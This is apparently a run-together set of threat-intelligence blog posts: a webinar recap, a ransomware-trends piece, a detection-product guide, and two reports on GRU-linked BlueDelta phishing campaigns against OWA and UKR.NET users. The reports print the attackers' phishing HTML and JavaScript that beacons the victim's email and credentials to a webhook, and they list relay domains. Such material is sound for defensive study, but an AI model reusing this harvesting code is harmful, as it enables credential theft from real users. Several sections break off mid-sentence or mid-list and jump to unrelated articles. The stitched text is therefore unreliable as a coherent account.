Our webinar panelists noted that the availability of rich threat intelligence has transformed how their organizations approach decision-making. According to Jack Watson, Senior Threat Intelligence Analyst at Global Payments, “Understanding that one alert opened and one alert closed does not necessarily equate to one single adversary being stopped” has led his team to take “a much more holistic approach to looking at problems.”

Omkar Nimbalkar, Senior Manager of Cyber Threat Research and Intelligence at Adobe, said, “Once you start doing this work day in and day out, you uncover patterns in your environment. You uncover what your posture looks like, where your true risk resides, and you can use that as a means to inform the business on the changing threat landscape for better decision-making.”

Ryan Boyero, Recorded Future’s Senior Customer Success Manager, said context and storytelling are key benefits of threat intelligence. “You can have a precursor or malicious activity that has occurred,” he said, “but without threat intelligence, you can’t really tell the story or paint the picture to deliver to senior leadership in order to help make the best and informed decisions possible.”

How threat intelligence delivers organization-wide value

Nimbalkar said his team provides tailored threat intelligence to business units and product teams across Adobe so they can monitor for specific behavioral activities and block specific threats in their environments.

Boyero shared that Recorded Future customers in EMEA use threat intelligence to educate leadership. “We're able to inform leaders,” he said. “We're able to speak with executives, get them in the room, not so much scare them that a situation could happen or has happened, but ultimately just educate and let them know that this is what Recorded Future is able to do and how we can bring success to the table.”

Erich Harbowy, Security Intelligence Engineer at Superhuman, said that in addition to educating leaders about risk, his team also uses threat intelligence to show the value of their work. “Not only am I using this very current news, I am also using the statistics that come along with that,” he said. “How much damage occurred during the first attack that was similar to this? And are [my adversaries] done? Are they coming back?”

Harbowy appreciates Recorded Future for providing those insights for postmortems and follow-ups with executives. “How do I prove my worth?” he said. “Give me the intel.”

The anatomy of a mature threat intelligence program

According to Nimbalkar, maturity comes when the foundational tactical and operational work is complete. He said that advancing a threat intelligence program is all about efficiency and optimization, including making sure you have high-fidelity indicators so your noise-to-signal ratio is reduced and you have higher-quality detections, understanding who your adversaries are and how they’re targeting you, getting in front of stakeholders and engaging with cross-functional teams, and collecting metrics on everything you do.

“Once you have figured out all these workflows, automated as much as you can, optimized and made it efficient, and then you focus more on risk reduction across the environment and more on strategic initiatives, that’s a very good maturation,” he said.

Jack Watson of Global Payments described threat intelligence maturity as the ability to ingest and action intelligence. “It’s never been easier to ingest data, but it’s also never been harder to sift through [that data]. So we’re seeing more mature organizations developing automated workflows, developing custom capabilities to do collection and action, and using AI in unique ways.”

Pathways to advancing maturity

Nick Rainho, Senior Intelligence Consultant at Recorded Future, said that the key to advancing maturity is having solid intelligence requirements. “Especially if you’re working with limited resources, go for the low-hanging fruit and ensure that the intelligence you’re pulling in is relevant to senior leadership’s priorities.”

Ryan Boyero agreed that maturity success is predicated on understanding leadership’s key requirements. “And then, how are we able to work towards that greater good and define success together?”

Top challenges for CTI teams

The panelists agreed that information overload is a critical challenge for today’s CTI teams. “More data is better than less,” said Watson, “but you have to be able to whittle it down or it’s useless.”

Nimbalkar said that with new tools in the market, advancements in AI, and the exponential growth in the volume of data, teams need vendors that can provide better integration to make data more actionable. And Rainho agreed, calling for better out-of-the-box integrations between intelligence tools so security teams can consume intelligence in the location and manner that works best for them.

Looking to the future of threat intelligence

When asked how they think the threat landscape will evolve and how technology will evolve with it, the panelists shared a number of predictions. They believe AI will enable CTI teams to fight AI-powered threats at scale. Third-party risk management will become an even more critical discipline for proactive defense. Digital threats will continue to outpace physical threats. And while junior analysts won’t be replaced by AI, their jobs will look very different as they use AI to augment their workflows.

Watch the recordings of the North America and EMEA webinar sessions to learn more, and download the 2025 State of Threat Intelligence Report to see how your peers are evaluating, investing in, and operationalizing threat intelligence.

Executive Summary

Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). This activity represents an expansion of BlueDelta’s ongoing credential-theft operations previously detailed in Insikt Group’s December 2025 report.

Insikt Group identified BlueDelta targeting a small but distinct set of victims during its 2025 credential-harvesting activity. Targets included individuals linked to a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank and organizations in North Macedonia and Uzbekistan. The use of Turkish-language and regionally targeted lure material suggests that BlueDelta tailored its content to increase credibility among specific professional and geographic audiences. These selections reflect a continued interest in organizations connected to energy research, defense cooperation, and government communication networks relevant to Russian intelligence priorities.

BlueDelta’s credential-harvesting pages impersonated a range of legitimate webmail and VPN services, including Microsoft Outlook Web Access (OWA), Google, and Sophos VPN portals. Each page replicated authentic login interfaces and redirected victims to legitimate websites after they submitted their credentials, thereby reducing suspicion. The campaigns relied heavily on free hosting and tunneling services, such as Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host phishing content, capture user data, and manage redirections. Several pages also incorporated legitimate PDF lure documents to enhance realism and evade automated detection.

BlueDelta’s consistent abuse of legitimate internet service infrastructure demonstrates the group’s continued reliance on disposable services to host and relay credential data. These campaigns underscore the GRU’s sustained commitment to credential harvesting as a low-cost, high-yield method of collecting information that supports Russian intelligence objectives.

Key Findings

• BlueDelta expanded its credential-harvesting operations throughout 2025, deploying new campaigns themed as Microsoft Outlook Web Access (OWA), Google, and Sophos VPN login portals.
• The group leveraged a combination of free hosting and tunneling services, including Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host credential-harvesting pages and exfiltrate stolen data.
• Multiple campaigns incorporated legitimate PDF lure documents, such as publications from the Gulf Research Center and the EcoClimate Foundation, to increase the appearance of authenticity and bypass email security controls.
• BlueDelta used customized JavaScript functions to capture credentials, track victim activity, and automate redirection to legitimate websites, reducing manual setup and increasing operational efficiency.
• Targeted email addresses and redirection behavior suggest BlueDelta focused on researchers and institutions in Türkiye and Europe, aligning with Russia’s broader intelligence-gathering priorities.

Background

BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation's Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has carried out credential-harvesting and espionage operations for more than a decade. This campaign overlaps with activity previously attributed by Insikt Group to BlueDelta, which multiple Western governments attribute with high confidence to the GRU.

Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics companies, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on Microsoft Outlook, UKR.NET, and other webmail services, using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.

Technical Analysis

Between February and September 2025, Insikt Group analyzed a series of credential-harvesting campaigns attributed to BlueDelta. These campaigns demonstrate continued refinement of BlueDelta’s spearphishing tradecraft, with the group adopting new lure themes, multi-stage redirection chains, and enhanced credential-harvesting mechanisms. Each campaign abused free hosting and tunneling services to host malicious content and relay harvested data, reflecting BlueDelta’s persistent use of low-cost, easily disposable infrastructure.

Microsoft OWA Credential Harvesting

On February 6, 2025, BlueDelta deployed a new credential-harvesting page themed as a Microsoft Outlook Web Access (OWA) login page, as shown in Figure 1.

Figure 1: OWA login-themed credential-harvesting page (Source: Recorded Future)

BlueDelta employed the link-shortening service ShortURL for the first-stage redirection, using the URL hxxps://shorturl[.]at/Be4Xe. The shortened link redirected victims to a second stage, which was hosted using the free API service Webhook[.]site, via the URL hxxps://webhook[.]site/e8ae3bbd-ab02-46b7-b84c-f5f4baa5d7c7. BlueDelta has regularly used Webhook[.]site for credential harvesting and phishing in recent campaigns.

The initial webhook in this campaign differs from those previously reported by Inskit Group; instead of hosting the credential-harvesting page, it uses HTML to load a PDF lure document into the victim's browser for two seconds before redirecting to a second webhook, as per Figure 2.

<html>
  <head>
    <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width">
        <meta http-equiv="refresh" content="2; url=hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4">
  </head>
  <body>
    <object data="hxxps://www[.]grc[.]net/documents/68527c604ba00StrategicandPoliticalImplicationsforIsraelandIran2[.]pdf" type="application/pdf" style="min-height:100vh;width:100%"></object>
  </body>
</html>

Figure 2: HTML used to display a PDF lure on the victim's browser (Source: Recorded Future)

The PDF lure document, shown in Figure 3, is a legitimate report published by the Saudi Arabia-based think tank Gulf Research Center (GRC), entitled “Strategic and Political Implications for Israel and Iran: The Day After War.”

Figure 3: Legitimate GRC PDF lure used by BlueDelta in credential harvesting (Source: Recorded Future)

After the PDF lure has displayed for two seconds, the page redirects to a second webhook located at the URL hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4, which hosts a spoofed OWA login page as shown in Figure 1. The page's structure is very similar to that of previous BlueDelta credential-harvesting pages, but the theme has been updated to represent a login page rather than a password reset page.

As shown in Figure 4, BlueDelta has added a new hidden HTML form element used to store the current page's URL. The HTML element is populated using JavaScript at page load, as shown in Figure 5, and is later used to capture victim information when the page opens and credentials are submitted. This update reduces BlueDelta's administrative burden by eliminating the need for manual addition of the exfiltration URL to credential-harvesting pages.

Figure 4: Hidden HTML form element populated using the page URL at page load (Source: Recorded Future)

<script>
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('username').value = user;
document.getElementById('href').value = window.location.href;

var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
window.history.pushState({}, document.title, '/owa/');
</script>

Figure 5: JavaScript used to capture the current URL, set a hidden form element, send a “page-opened” beacon, and change the displayed URL in the victim's browser (Source: Recorded Future)

The stored URL is then used as the destination of a page-opened beacon, which collects the victim's email address from the query string parameter “u=” and sends it in JSON format back to the webhook. The webhook additionally captures the victim's IP address and user agent. After the page URL has been saved and the page-opened beacon sent, BlueDelta modifies the page URL to /owa/ to imitate a legitimate OWA login page.

When the HTML form is submitted, a JavaScript function named myFunction captures the entered username and password and sends them via an HTTP POST request to the hidden form element’s webhook. The page is then redirected to the GRC PDF hosted on the GRC website after a one-second delay, as shown in Figure 6.

• Declining payments, evolving tactics: Ransomware groups made less money in 2025 despite a 47% increase in publicly reported attacks, pushing them to adopt new approaches to extract payment, namely, DDoS-as-a-Service offerings, insider recruitment, and gig worker exploitation.
• Insider threats are rising: With stolen credentials, vulnerability exploitation, and phishing still dominating initial access, ransomware operators are increasingly turning to native English speakers to recruit corporate insiders—a trend likely to accelerate if layoffs continue into 2026.
• Global expansion underway: Recorded Future predicts 2026 will mark the first year that new ransomware actors operating outside Russia outnumber those within it, reflecting the rapid globalization of the ransomware ecosystem.

The ransomware paradox: More attacks, less money

By most accounts, ransomware groups made less money in 2025 than in 2024, both in overall payments and average payment size. This occurred despite a significant increase in attack volume: according to Recorded Future Intelligence, publicly reported attacks rose to 7,200 in 2025 compared to 4,900 in 2024, demonstrating a 47% increase.

For context, Recorded Future classifies both encryption attacks and data theft attacks with an extortion component under the ransomware umbrella. While exact numbers are difficult to isolate, approximately 50% of all attacks we track fall into the data theft and extortion category.

This declining profitability is driving ransomware groups to expand and evolve their tactics. Here are three trends organizations should prepare for heading into 2026.

Trend 1: DDoS services return to the RaaS model

With affiliates earning less and many ransomware operators abandoning the Ransomware-as-a-Service (RaaS) model to operate independently, remaining RaaS operations must offer more value to attract and retain affiliates. One increasingly common differentiator: bundled DDoS services.

The newly formed Chaos ransomware group (distinct from the older group of the same name) exemplifies this trend, providing DDoS capabilities to all affiliates. While this tactic isn't new—for example, REvil previously offered similar services—it fell out of favor for a period. Now, with fewer ransom payments to share, RaaS operators are reintroducing premium services to maintain their affiliate networks.

• What this means for defenders: Organizations should ensure their DDoS mitigation strategies account for attacks that may accompany ransomware incidents. The pressure tactics are becoming multi-pronged.

Trend 2: Insider recruitment attempts are accelerating

Stolen credentials, vulnerability exploitation, and phishing remain by far the most common initial access vectors for ransomware groups, with social engineering as a distant but growing fourth method. However, there has been a notable increase in ransomware groups working with native English speakers to recruit corporate insiders.

The most public example came earlier this year when a ransomware group attempted to recruit a reporter at the BBC. But this represents only the visible tip of a larger trend. Private reporting indicates that insider recruitment attempts increased significantly throughout 2025 and will likely continue growing, especially if workforce reductions at major companies persist into 2026.

• What this means for defenders: Insider threat programs should be evaluated and strengthened. Employee awareness training should address the possibility of external recruitment attempts, and organizations should monitor for anomalous access patterns that could indicate insider-facilitated attacks.

Trend 3: Gig workers as unwitting attack vectors

According to a recent FBI advisory, ransomware groups have begun exploiting gig work platforms to carry out attacks when remote methods fail. In one documented case, an attacker successfully executed a social engineering help desk scam but couldn't install their tools remotely due to security controls. Their solution: recruiting a gig worker through a legitimate platform to physically enter corporate offices and steal data.

The gig worker was unaware they were working for hackers, believing they were performing a legitimate IT task. The targeted employee thought they were assisting someone from the help desk. While this attack vector remains rare, the accessibility and global reach of gig work platforms means other groups could replicate this approach with minimal effort.

• What this means for defenders: Physical security protocols should account for social engineering scenarios involving legitimate-looking third parties. Verification procedures for on-site IT work deserve renewed scrutiny.

Looking ahead: One big prediction for 2026

The ransomware ecosystem has seen tremendous growth among actors and groups operating outside of Russia.

Recorded Future believes that 2026 will be the first year the number of new ransomware actors outside Russia exceeds those emerging within it. This doesn't indicate a decline in Russian-based operations; instead, it reflects how dramatically the global ransomware ecosystem has expanded.

The bottom line: Strengthen your ransomware defenses

Understanding emerging ransomware tactics is the first step toward defending against them. To stay ahead of threat actors and protect your organization:

• Explore Recorded Future's Ransomware Mitigation Solution for end-to-end visibility into your ransomware exposure across the attack lifecycle.
• Read our latest Insikt Group® research on ransomware trends, threat actor TTPs, and emerging attack vectors.
• Download the Proactive Ransomware Mitigation eBook for actionable strategies to identify, investigate, and prioritize cyber threats.

• Digital threats now originate far beyond the perimeter. Identity exposure, brand impersonation, and attacker coordination across the open, deep, and dark webs create risks that traditional tools cannot detect early enough.
• Context is the foundation of effective detection. Raw alerts and isolated indicators offer little clarity. Real-time intelligence turns noise into actionable insight.
• Modern digital threat detection (DTD) requires visibility across the external digital environment. The earliest warning signs of ransomware, credential theft, and phishing campaigns appear long before internal alerts fire.
• Analysts need automation to keep pace. High alert volumes and false positives overwhelm SOC teams. Automated enrichment, correlation, and prioritization significantly reduce investigation time and alert fatigue.
• Recorded Future operationalizes intelligence at enterprise scale. The Intelligence GraphⓇ, Digital Risk Protection, and deep SIEM/SOAR/EDR integrations deliver immediate context, organization-specific visibility, and unified detections, improving time-to-detect, time-to-contain, and overall resilience.

Why Digital Threat Detection Requires a New Approach

Today’s cyber threats evolve too quickly and appear across too many digital touchpoints for isolated tools or static detection rules to keep up. SOC teams must contend with:

• High alert volumes from SIEM, EDR, cloud telemetry, identity systems, and external sources.
• Evolving adversary techniques, including automated attacks and infrastructure that changes by the hour.
• Expanding attack surfaces driven by SaaS adoption, third-party dependencies, social platforms, and cloud-native architectures.
• Alert fatigue from manually sifting through noise to find high-risk signals.

As a result, organizations often struggle to distinguish meaningful threats from the constant noise of daily security events.

Digital threat detection (DTD) addresses this challenge by shifting focus from isolated internal signals to continuous identification, analysis, and prioritization of threats across an organization’s entire digital ecosystem. Unlike traditional perimeter-focused detection, which relies on firewalls, antivirus, and static rules, DTD recognizes that modern threats originate from external infrastructure, supply chains, cloud environments, identities, brand assets, and the open web.

The shift from reactive, point-in-time monitoring toward a proactive, intelligence-led model gives defenders the context they need to understand not just what is happening, but why it’s happening and what to do next. This article will serve as a comprehensive guide for security professionals, defining DTD and exploring the essential tools, methodologies, and practices required to build a proactive and intelligent security program.

Understanding the Modern Digital Threat Landscape

To build an effective digital threat detection program, security teams must understand where modern threats originate and how attackers operate.

Key Threat Vectors Beyond the Perimeter

Leaked credentials and account takeover attempts (stolen identities)

Compromised identities are now the most common entry point for attackers. Credentials harvested from stealer logs, breach dumps, or phishing toolkits often circulate online long before defenders know they’re exposed.

Brand impersonation, domain spoofing, and phishing campaigns

Attackers increasingly weaponize an organization’s public presence and create look-alike domains, fraudulent social profiles, or cloned websites to exploit user trust. These impersonation campaigns often serve as the launchpad for credential harvesting, malware delivery, and social engineering operations.

Vulnerability exploitation and zero-day threats in the external attack surface

Public-facing assets such as web applications, cloud workloads, exposed services, and third-party integrations are constantly probed for misconfigurations and unpatched vulnerabilities.

Dark web chatter and early warning signs of planned ransomware or DDoS attacks

Long before a ransomware deployment or DDoS attack hits production systems, signals often surface in underground communities. Threat actors discuss tools, trade access, or signal interest in specific industries and regions.

Why an Intelligence-Driven Approach is Better

For years, security programs centered their detection efforts on internal activity: log anomalies, endpoint alerts, authentication failures, and other signals that only appear after an attacker is already inside the environment. This approach is inherently reactive. It reveals what is happening within your systems, but not what is forming outside your walls or who may be preparing to target you next.

Digital threat detection reverses that model. Instead of waiting for internal symptoms of compromise, it looks outward at the behaviors and infrastructure, and intent of adversaries operating across the broader digital ecosystem. This expanded perspective allows teams to identify threats earlier in the kill chain, sometimes before any malicious activity reaches corporate networks.

The real advantage comes from context. Raw data on its own is ambiguous: an IP address, a file hash, a domain registration. With intelligence layered on top, those fragments become meaningful. Context exposes intent, and intent enables defenders to prioritize, escalate, or respond with precision rather than guesswork.

Essential Digital Threat Detection Tools and Technologies

Modern digital threat detection depends on a collection of tools that work together to surface early warning signals and provide the context you need to validate threats quickly.

Threat Intelligence Platforms: The Engines of Context

No human team can manually aggregate, cross-reference, and analyze the amount of threat data emerging across the web every minute. A modern threat intelligence platform automates this work, transforming massive volumes of raw, unstructured information into intelligence that analysts can act on immediately.

Threat intelligence platforms collect data from a wide range of external sources and standardize it into a usable format. Sources include:

• Open web reporting
• Underground forums
• Dark web marketplaces
• Malware sandboxes
• Threat feeds
• Researcher data

Once the data is normalized, the platform enriches it with context, such as:

• Relationships between indicators
• Associations with known threat actors
• Infrastructure reuse
• Activity targeting specific industries or regions

This enrichment process turns isolated artifacts into a coherent picture of adversary behavior, revealing intent, relevance, and potential impact in ways raw data alone cannot.

Security Orchestration, Automation, and Response (SOAR)

While threat intelligence provides the context needed to understand potential risks, SOAR platforms help teams take action on that intelligence quickly and consistently. These tools automate routine tasks that would otherwise consume analyst time, ensuring that high-priority threats receive attention without delay.

Key SOAR capabilities include:

• Enriching alerts with additional context from internal systems (SIEM, EDR, IAM, cloud telemetry)
• Blocking malicious indicators across firewalls, endpoints, cloud environments, and identity systems
• Initiating takedown workflows for harmful domains or impersonation infrastructure
• Coordinating actions across multiple security tools to ensure a unified response
• Documenting each step of the investigation for reporting and compliance

By automating the mechanics of response, SOAR platforms allow analysts to focus on higher-value decision making rather than repetitive execution, reducing dwell time and improving overall response efficiency.

Endpoint Detection and Response (EDR) & Security Information and Event Management (SIEM) Integration

EDR and SIEM platforms provide the internal vantage point of a digital threat detection program.

EDR monitors activity directly on endpoints, capturing details such as running processes, file modifications, and other behaviors that may indicate compromise on individual devices. SIEM systems, by contrast, collect and correlate logs from across the entire environment, including authentication systems, cloud services, applications, and network devices.

Together, these tools create a continuous stream of telemetry that reveals what is happening inside the organization, from process activity and login events to cloud logs and network traffic. When this internal data is correlated with intelligence about adversary infrastructure, active campaigns, or malicious tooling observed in the wild, EDR and SIEM can separate routine activity from signs of actual threats.

Modern platforms increasingly apply AI and machine learning to enhance this capability. Instead of relying solely on static signatures or predefined rules, they learn normal behavior across users and systems and identify subtle deviations that signal compromise.

Overcoming the Analyst’s Biggest Pain Points

Today’s threat landscape places enormous pressure on analysts. Internal alerts arrive faster than they can investigate them, and the earliest indicators of an attack often originate in places no traditional tool monitors.

The Drain of Alert Fatigue and False Positives

High alert volumes are a major driver of analyst burnout. Much of the day is spent triaging notifications with little context, forcing analysts to manually determine which events represent real threats and which are routine activity. The repetitive, high-stakes nature of this work is exhausting and increases the likelihood that critical signals will be missed.

The only reliable way to cut through this noise is to improve the quality of context surrounding each alert. When telemetry is paired with intelligence that explains adversary intent, infrastructure, and behavior, analysts can immediately see which signals matter and which can be safely deprioritized.

The Blind Spots of External Risk

Much of the activity that signals an impending attack happens beyond the reach of traditional security monitoring. Early warning signs often surface on the deep and dark webs, in criminal marketplaces, inside closed forums, and across fast-moving social platforms.

These external environments are frequently where the most actionable signals appear first. Credential dumps, access sales, discussions about targeting specific industries, and the creation of malicious infrastructure often occur long before any internal alert fires. Without insight into this external ecosystem, organizations are effectively blind to the earliest stages of an attack. And monitoring these spaces manually is nearly impossible at scale.

Recorded Future: Operationalizing Digital Threat Intelligence at Scale

Recorded Future’s approach to digital threat detection delivers real-time intelligence at enterprise scale, closing the visibility gaps that make modern detection so difficult and giving you the context you need, the moment you need it.

Real-Time Context from the Intelligence GraphⓇ

The Intelligence GraphⓇ addresses the fragmentation of global threat data, one of the most persistent challenges in modern security operations. Threat activity unfolds across millions of sources, including:

• Open web
• Dark web marketplaces
• Malware repositories
• Technical feeds
• Network telemetry
• Closed underground forums

No analyst team could manually track, interpret, and connect this information at the speed attackers operate. The Intelligence GraphⓇ solves this problem by continuously indexing and analyzing this vast ecosystem in real time. It structures billions of data points into clear relationships among threat actors, infrastructure, malware families, vulnerabilities, and targeted industries. Because these connections are made automatically, the platform can deliver immediate, decision-ready context on any indicator.

Comprehensive Digital Risk Protection for External Threats

Real-time context helps analysts understand what a threat is and who is behind it. But detection isn’t only about interpreting indicators; it's also about discovering specific threats against your organization across the broader internet.

Recorded Future’s Digital Risk Protection (DRP) solution focuses on the same external spaces where global threat activity occurs, but applies a different lens: it monitors those environments for anything tied to your brand, domains, executives, or employees. This targeted approach ensures you see early signals of impersonation, credential theft, or emerging attacks long before they reach your internal systems.

Accelerating Time-to-Action through Integrated Intelligence

Recorded Future accelerates detection and response by delivering high-fidelity intelligence directly into the tools analysts already rely on.

An extensive ecosystem of pre-built integrations and flexible APIs connect directly with every major SIEM, SOAR, and EDR platform. These integrations feed enriched threat context, dynamic Risk Scores, and prioritized intelligence into the tools analysts already use.

Collective InsightsⓇ adds a layer of visibility that other tools cannot provide. It consolidates detections from across your SIEM, EDR, SOAR, IAM, and other security platforms into a single view, then enriches them with high-fidelity Recorded Future intelligence.

This approach connects internal alerts to one another and exposes relationships that would remain hidden when each tool operates in isolation. By identifying MITRE ATT&CK® tactics, techniques and procedures (TTPs) and attributing malware, it surfaces attack patterns you can only see from an aggregated view.

Smarter, Faster Security Decisions

Recorded Future delivers the automated, contextual intelligence needed to identify risks the moment they emerge and empower teams to respond with confidence.

By unifying internal telemetry with real-time global threat insight and organization-specific targeting data, the platform enables smarter prioritization, faster action, and dramatically less noise.

These intelligence-driven workflows directly improve core detection metrics such as time-to-detect (TTD) and time-to-contain (TTC), giving organizations a measurable way to demonstrate progress and strengthen operational resilience.

Strengthen your security program and move toward intelligence-driven operations with confidence. Explore how Recorded Future can support your Digital Threat Detection strategy.

Executive Summary

Between June 2024 and April 2025, Recorded Future’s Insikt Group identified a sustained credential-harvesting campaign targeting users of UKR.NET, a widely used Ukrainian webmail and news service. The activity is attributed to the Russian state-sponsored threat group BlueDelta (also known as APT28, Fancy Bear, and Forest Blizzard). This campaign builds on BlueDelta’s earlier operations detailed in the May 2024 Insikt Group report “GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns,” which documented GRU-linked credential theft and espionage activity. While this campaign does not reveal specific targets, BlueDelta’s historical focus on credential theft to enable intelligence collection provides strong indicators of likely intent to collect sensitive information from Ukrainian users in support of broader GRU intelligence requirements.

Insikt Group observed BlueDelta deploy multiple credential-harvesting pages themed as UKR.NET login portals. The group leveraged free web services, including Mocky, DNS EXIT, and later, proxy tunneling platforms such as ngrok and Serveo, to collect usernames, passwords, and two-factor authentication codes. BlueDelta distributed PDF lures containing embedded links to these credential-harvesting pages, likely to bypass automated email scanning and sandbox detections. The tools, infrastructure choices, and bespoke JavaScript used in this report are consistent with BlueDelta’s established tradecraft and have not been observed in use by other Russian threat groups.

BlueDelta’s continued abuse of free hosting and anonymized tunneling infrastructure likely reflects an adaptive response to Western-led infrastructure takedowns in early 2024. The campaign highlights the GRU’s persistent interest in compromising Ukrainian user credentials to support intelligence-gathering operations amid Russia’s ongoing war in Ukraine.

Key Findings

• BlueDelta maintained a consistent focus on UKR.NET users, continuing its long-running credential-harvesting activity throughout 2024 and 2025.
• The group distributed malicious PDF lures that linked to credential-harvesting pages through embedded URLs, enabling it to evade common email filtering and sandbox detection techniques.
• BlueDelta transitioned from compromised routers to proxy tunneling platforms, such as ngrok and Serveo, to relay credentials and bypass CAPTCHA and two-factor authentication challenges.
• Activity between March and April 2025 revealed updates to BlueDelta’s multi-tier infrastructure, including new tier-three and previously unseen tier-four components, indicating increased operational layering and sophistication.
• The campaign demonstrates continued refinement of BlueDelta’s credential-theft operations, reflecting the GRU’s sustained focus on collecting Ukrainian user credentials for intelligence purposes.

Background

BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation’s Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has conducted credential-harvesting and espionage operations for more than a decade. The activity detailed in this report aligns with previous BlueDelta campaigns tracked by Insikt Group and consistently attributed by multiple Western governments to the GRU.

Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics firms, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on UKR.NET and other webmail services using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.

Technical Analysis

On June 14, 2024, Insikt Group identified a new BlueDelta credential harvesting page, themed as a UKR.NET login page, as shown in Figure 1. The page was hosted using the free API service Mocky, which BlueDelta used regularly for most of its credential harvesting pages throughout 2024.

Figure 1: The credential harvesting page displayed a UKR.NET login page (Source: Recorded Future)

The malicious UKR.NET page had very similar functionality to that previously observed by Insikt Group. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the domain and fixed a high port combination, kfghjerrlknsm[.]line[.]pm[:]11962, as per Figure 2.

Figure 2: UKR.NET credential capture page JavaScript (Source: Recorded Future)

The line[.]pm apex domain is owned by the free hosting company DNS EXIT, which offers free subdomain hosting.

At the time of analysis, the domain resolved to the IP address 18[.]157[.]68[.]73, which is an Amazon Elastic Compute Cloud (EC2) instance suspected of being used by the globally distributed reverse proxy service ngrok. ngrok offers a free service that enables users to connect servers behind a firewall to a proxy server and expose that server to the internet without changing firewall rules. In this instance, the service is likely being abused by BlueDelta to mask the true location of its upstream infrastructure.

The use of ngrok represents a notable change in BlueDelta’s infrastructure, as the threat group previously used compromised Ubiquiti routers to host Python scripts that captured credentials and handled 2FA and CAPTCHA challenges. This change is likely a response to efforts by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners to dismantle BlueDelta's infrastructure in early 2024.

BlueDelta added new functionality to the page hosted on kfghjerrlknsm[.]line[.]pm to capture victim IP addresses using the free HTTP request and response API service HTTPBin, as shown in Figure 3.

var respIP=$.getJSON('hxxps://httpbin[.]org/ip');

Figure 3: Credential harvest page JavaScript, used to capture the victim's IP address (Source: Recorded Future)

Two additional credential harvesting pages were discovered in July and September 2024 that matched the configuration of the first page but used different Mocky URLs, with one of the pages configured to use a different port number. This is likely due to BlueDelta setting up a new ngrok tunnel.

On September 13, 2024, Insikt Group identified a new UKR.NET credential harvesting page, which was again hosted on Mocky. For this page, BlueDelta exfiltrated credentials and relayed CAPTCHA information to the domain 5ae39a1b39d45d08f947bdf0ee0452ae[.]serveo[.]net.

The apex domain serveo[.]net is owned by Serveo, a company that offers free remote port forwarding services similar to ngrok.

In October and November 2024, Insikt Group identified three new UKR.NET-themed credential harvesting pages. Again, these pages were hosted using Mocky and were constructed with similar JavaScript to the previously reported pages. However, in the latest pages, BlueDelta moved upstream credential capture and relay functionality back to ngrok, using the custom DNS EXIT domain jkbfgkjdffghh[.]linkpc[.]net, configured with two separate fixed high ephemeral ports: 10176 and 17461. At the time of analysis, the linkpc[.]net domain resolved to suspected ngrok IP address 3[.]67[.]15[.]169.

Additionally, BlueDelta added new first-stage redirection domains for two of the pages: ukraine[.]html-5[.]me and ukrainesafe[.]is-great[.]org. It is likely that the threat actors added this extra step to hide Mocky URLs in phishing emails. The apex domains html-5[.]me and is-great[.]org are owned by the free hosting company Byet Internet Services.

On December 27, 2024, Insikt Group identified a new BlueDelta UKR.NET credential harvesting page hosted on the Mocky URL run[.]mocky[.]io/v3/72fa0a52-6e6e-43ad-b1c2-4782945d6050. The malicious UKR.NET page had very similar functionality to the previously detailed pages. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the same DNS EXIT domain, with an updated fixed port, jkbfgkjdffghh[.]linkpc[.]net:17461, as shown in Figures 4 and 5.

Figure 4: JavaScript functions and variables containing the linkpc[.]net domain (Source: Recorded Future)

Figure 5: JavaScript code used to capture credentials (Source: Recorded Future)

During the analysis of this credential harvesting page, Insikt Group detected over twenty linked PDF files, which BlueDelta likely sent to victims as phishing lures. The PDF lure document, as shown in Figure 6, informs the target of suspicious activity on their UKR.NET account and requests that they click a link to reset their password.

Figure 6: PDF lure used by BlueDelta to entice victims to click links leading to credential harvesting pages

(Source: Recorded Future)

Each of the PDFs included a hyperlink to a credential harvesting page. Most of these links were either shortened using link-shortening services or used a domain registered through a free hosting provider. Since 2023, BlueDelta has used the following link-shortening platforms:

• doads[.]org
• in[.]run
• t[.]ly
• tiny[.]cc
• tinyurl[.]com
• linkcuts[.]com

In addition to link-shortening services, BlueDelta has employed free domains from the hosting provider InfinityFree or from Byet Internet Services, or subdomains provided by the free blogging platform Blogger (formerly Blogspot) for tier-two link redirection, in conjunction with link-shortening services. The following apex domains have been used in BlueDelta campaigns since 2023:

• China’s observed use of zero-days has declined since 2023. However, it has expanded its capacity to discover and manage vulnerabilities, signaling a continued effort toward stockpiling exploits for strategic or military advantage.
• The Data Security Law (DSL) and Provisions on the Management of Network Product Security Vulnerabilities (RMSV) give the Chinese state first access and control over zero-days. Combined with government-backed competitions, incentives, and private contractors, this framework likely sustains one of the world’s largest reserves of exploitable vulnerabilities.
